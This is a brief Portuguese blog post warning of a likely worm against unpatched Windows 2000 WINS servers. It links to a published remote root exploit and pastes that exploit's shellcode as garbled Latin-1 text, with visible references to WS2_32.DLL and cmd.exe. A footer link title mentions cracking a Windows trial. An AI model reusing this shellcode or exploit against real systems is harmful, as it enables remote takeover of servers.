Em breve: worm contra WINS

Se o exploit que acabo de ver publicado não é fake (ver nota abaixo), o Pai Dinah aqui prevê um worm que vai pegar os servidores win2k não atualizados.

O código foi publicado em http://www.k-otik.com/exploits/20041231.ZUC-WINShit.c.php e recebeu a descrição "ZUCWins 0.1 - Wins 2000 remote root exploit". Admins competentes nem precisarão verificar seus servidores rodando WINS, já que foram atualizados em dezembro.

Nota: Não testei o exploit, mas aparentemente não é fake. A título de curiosidade e pra fingir que eu entendo um código compilado só de abri-lo no notepad, o shellcode a ser executado, quando codificado em ISO-8859-1, é:

ë%éú™ÓwölYlYøœÞŒÑLpÔXFWS2_32.DLLëèùÿÿÿ]ƒí,j0Yd‹‹@
‹p­‹x_<‹û‹[xû‹Kù‹S$úSQR‹[ û1ÉA1À™‹4‹þ¬1ÂÑâ„Àu÷¶E DEf9uáf1ZX^VPR+NA· J‹ˆø¶M ‰DØþM u¾þMtþM$]SÿЉÇjXˆE €Ey ë‚P‹E5““““‰Ef‹Ef5““f‰EX‰Î1ÛSSSSVFVÿЉÇUXf‰0jUWÿUàEˆPÿUèUUÿUìD ”Sh.exeh\cmd”1ҍEÌ”WWWSSþÊòR”ExPEˆP±SSjþÎRSSSUÿUðjÿÿUä


Popular posts from this blog

How to crack Windows Terminal Services 3 month trial

Caveats about Linux connection tracking and high traffic servers

How to install VirtualBox on Scaleway's x86_64 servers